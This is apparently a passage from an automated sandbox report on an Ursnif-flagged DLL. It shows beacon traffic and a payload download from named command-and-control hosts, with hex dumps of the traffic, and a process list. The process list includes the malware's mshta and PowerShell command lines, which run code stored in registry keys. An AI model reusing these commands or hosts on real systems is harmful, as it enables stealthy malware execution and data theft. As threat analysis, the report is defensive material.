Nov 24, 2020 21:20:10.932638884 CET | 4541 | OUT | GET /api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Nov 24, 2020 21:20:11.915036917 CET | 4542 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Nov 2020 20:20:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Content-Encoding: gzip
                                                                                                                                      Data Raw: 37 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 93 45 b6 a4 50 00 43 17 c4 00 7d c8 10 77 77 66 b8 17 52 50 c8 ea fb f7 02 72 92 93 e4 0a 9f a5 f0 f9 03 cd 4b d3 90 be ac 60 e5 4f 17 64 55 6e 37 ea 19 51 a8 e5 e9 99 a2 c4 1f 56 1e 16 4e 3d 7b e0 ca 80 4a f5 47 b7 22 fb 31 a0 37 ba 9e 3d 3a 53 a0 15 63 50 ea 8b 52 79 3f 98 a9 9d 78 5c ef 52 d3 d3 ac bd 4b 09 d9 af a3 59 bd 52 a0 56 b9 f4 ea d9 19 b0 72 ab 29 66 97 af 34 55 cd 83 fd e5 69 48 11 50 f4 61 02 fa d5 c8 99 ca 08 0e 97 e2 5b 76 a8 53 57 0d b1 d1 10 ea 2b 33 1a ad 6b d8 a4 38 6d 66 c3 d7 5b fb f0 5b 3b 9e 9a ee 7c 00 3f 8c d1 ca 03 f6 e3 62 0d 97 c3 ef c4 28 2c 4d e6 7d c2 91 fa 59 d4 ce f4 bb a2 20 b1 bb 01 48 c7 e3 2c a0 50 bd 6a 86 2c cf ab 91 a9 43 b8 ec d4 95 75 0f c5 f7 47 92 dd 18 e3 a4 18 4d 17 09 f0 42 24 79 35 ae 51 d6 ad 17 59 61 ee f4 d0 22 de 12 46 d0 a0 43 97 e9 a9 59 fb 96 fa 55 e2 fb a8 fc 34 d9 c8 b6 9f 55 82 8e 64 27 6d 0a 0a 6c 28 b6 56 9b c3 06 41 ce 5f a6 dd 37 eb 47 81 04 a1 d5 2c fa 90 8a 87 7e a0 e5 c3 58 99 19 ee 9c ae bd f7 6b 38 da 5d 00 61 25 16 cb ed 12 22 79 51 ce 76 1b 9b 45 dc e5 17 0e cd db 1a 99 5f 35 02 cf f4 7c 14 7a 27 be 48 0f ce 4e 76 f1 9b 96 f1 83 91 aa ad 04 6a ae 2b b4 e6 3d f2 49 86 cf 7d 4f 63 30 d6 52 41 22 99 8b b8 42 44 05 20 58 ca 96 d2 ec d9 e7 99 11 81 64 e9 cc 39 2c da 10 f8 cb 79 98 ee 23 d4 07 fc 0d 70 c3 5b f7 eb 7f 70 25 68 ac e9 c2 3a 7f d3 e7 80 bc bd 46 b8 0a f1 da fe 81 ab 12 31 55 82 be 3e a2 fa 68 6b 76 81 3e 5c a7 d2 ee b6 11 c6 90 16 99 ca 6c 84 f3 84 b9 22 2a 9c d0 ba 13 6f f5 4b e7 de da da b1 56 88 31 60 3f f9 f6 45 7f 27 27 2c 11 88 b2 ae e8 2f 78 d3 66 26 c9 be 26 25 89 96 93 a9 5e 4f 18 84 05 e3 f0 96 dd 85 2b cb ae d7 f1 96 17 0c 27 c3 80 ca 1e 59 45 2d 0d ae f2 23 3a 4b 0e ba cd 14 3b 8f ba 83 d4 b3 2f 58 2b 8e 4f a5 92 1f c7 f8 e4 a8 79 c5 23 b8 5c 5b 02 91 d4 d3 59 d9 64 ea 26 9c 85 d2 b1 ed 
9d 65 0f f2 15 d6 bc dd 18 25 cc 71 0c 25 cf 45 b3 a5 8f c4 3a 05 33 6e 03 d1 65 68 ff ae cc e6 87 ec 3d 31 08 03 fc ca 98 08 e5 1f 33 07 24 1d 37 51 98 b6 50 b9 10 a9 84 1f bb 95 52 10 3e ea 7a 13 c8 7e d2 1f 71 35 2f d4 62 2a 8f 1e 45 8b 9e b2 ca 66 b9 2a af 2d e9 51 e5 2b 49 6d 22 19 b3 ec 36 1e be be 78 1e 84 c0 4d 55 1f ab 44 aa cf 24 2e d9 f2 a4 cc cc 53 0b 1f 5c 45 ec 85 c9 6b 50 af 6a 3d 77 11 e3 8b f6 99 dc 0a 28 b2 11 ed 34 84 98 84 f4 11 23 df a6 90 f1 a8 62 c4 96 44 aa 26 0a 29 0a ae 21 3c d3 14 63 11 ca 8d 76 9b 21 05 29 66 e1 65 71 01 77 a2 b3 9f 41 ba 0c cd c2 c9 df 0f b2 50 99 44 07 2a 85 52 d8 a2 3f fc 19 3f 94 a7 45 77 0e d1 39 33 80 d1 8b ab 31 8b 48 43 a0 ad 72 7c 01 e8 11 7f 62 71 9c a5 e5 d5 93 83 be 50 ec 0c b3 64 ba 9d 90 72 82 e9 35 2b 74 d1 01 7c a1 87 6c f1 ba 8b 13 b3 78 82 8f 84 3e 22 b7 5c 0b 12 7a 7b aa 73 1c e9 cc a3 33 d3 ff 31 90 74 e2 83 cc 99 8e e8 3b 4a 6d c2 bc 31 fb 5d 19 54 d0 fa 23 6c b3 b7 b3 a8 de 86 e1 4b 23 b5 a2 c6 db 12 ec 77 fd 0f 5d 5d e7 62 0d 70 4e 37 df b3 4f 61 6d 36 10 e1 0d c6 c5 27 8e 10 4c 06 52 f1 99 a8 a0 eb 3b c2 36 ea 7e 99 79 b6 4e 1d d6 d1 cd e7 91 d6 51 ee 4e 2b 1b 30 8d b9 16 dc 4a e1 04 0f 78 28 e0 5e 3e 48 16 26 9b 8f c9 68 9a 59 af b8 88 5f ee 63 cc 8b 99 bc c3 6e 44
                                                                                                                                      Data Ascii: 73bEPC}wwfRPrK`OdUn7QVN={JG"17=:ScPRy?x\RKYRVr)f4UiHPa[vSW+3k8mf[[;|?b(,M}Y H,Pj,CuGMB$y5QYa"FCYU4Ud'ml(VA_7G,~Xk8]a%"yQvE_5|z'HNvj+=I}Oc0RA"BD Xd9,y#p[p%h:F1U>hkv>\l"*oKV1`?E'',/xf&&%^O+'YE-#:K;/X+Oy#\[Yd&e%q%E:3neh=13$7QPR>z~q5/b*Ef*-Q+Im"6xMUD$.S\EkPj=w(4#bD&)!<cv!)feqwAPD*R??Ew931HCr|bqPdr5+t|lx>"\z{s31t;Jm1]T#lK#w]]bpN7Oam6'LR;6~yNQN+0Jx(^>H&hY_cnD
Nov 24, 2020 21:20:11.915086031 CET | 4543 | IN | Data Raw: 6a 3b 1f fb 34 23 d9 ce 3c 93 84 63 7b 58 ea db 1f 8c 29 b6 3b 2a 98 6d 3e b0 a9 bb 1f cc 5f e0 9f 4f c4 00 19 e6 4d cf 62 f4 b1 de 32 8a bf e9 a4 05 2b 88 fa 0a a7 64 cd 61 f9 83 8b 8e 54 09 b1 65 1d 7f 9f 6f 8d 4f 42 13 b4 d5 b6 44 5d 32 7e 33
                                                                                                                                      Data Ascii: j;4#<c{X);*m>_OMb2+daTeoOBD]2~3[QKx9?2o+Cl.8A!o*>9nCAFiGEX<5@{%JY[$z>OwUm1q(HY,f!$?Ozb990{C


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49758 | 47.241.19.44 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Nov 24, 2020 21:20:47.541162014 CET | 4561 | OUT | GET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Host: c56.lepini.at
Nov 24, 2020 21:20:48.222243071 CET | 4570 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:47 GMT
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Content-Length: 138820
                                                                                                                                      Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                      Connection: close
                                                                                                                                      ETag: "5db6b84e-21e44"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 
50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                                                                      Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Nov 24, 2020 21:20:48.222305059 CET | 4571 | IN | Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8
                                                                                                                                      Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8|ymf&ASxYE6*Vfy
Nov 24, 2020 21:20:48.222347021 CET | 4572 | IN | Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1
                                                                                                                                      Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Nov 24, 2020 21:20:48.222404003 CET | 4574 | IN | Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23
                                                                                                                                      Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Nov 24, 2020 21:20:48.222456932 CET | 4575 | IN | Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4
                                                                                                                                      Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Nov 24, 2020 21:20:48.222507954 CET | 4577 | IN | Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63
                                                                                                                                      Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Nov 24, 2020 21:20:48.222563028 CET | 4578 | IN | Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1
                                                                                                                                      Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Nov 24, 2020 21:20:48.222618103 CET | 4579 | IN | Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77
                                                                                                                                      Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
Nov 24, 2020 21:20:48.222668886 CET | 4581 | IN | Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed
                                                                                                                                      Data Ascii: ^P_L1l`>up_`O`RC'2*%[Tj0#*@J|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
Nov 24, 2020 21:20:48.222723961 CET | 4582 | IN | Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59
                                                                                                                                      Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv|&g6wHLTk?N~d>,<AHkPyhv?R
Nov 24, 2020 21:20:48.484675884 CET | 4585 | IN | Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41
                                                                                                                                      Data Ascii: hG&|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp


                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Memory Usage

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Behavior

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Start time:21:18:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll'
                                                                                                                                      Imagebase:0xba0000
                                                                                                                                      File size:119808 bytes
                                                                                                                                      MD5 hash:76E2251D0E9772B9DA90208AD741A205
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Start time:21:19:13
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                      Imagebase:0x7ff66ff30000
                                                                                                                                      File size:823560 bytes
                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:19:14
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:19:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                      Imagebase:0x7ff66ff30000
                                                                                                                                      File size:823560 bytes
                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:19:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:04
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:16
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                      Imagebase:0x7ff6232d0000
                                                                                                                                      File size:14848 bytes
                                                                                                                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:17
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                                                                      Imagebase:0x7ff785e30000
                                                                                                                                      File size:447488 bytes
                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
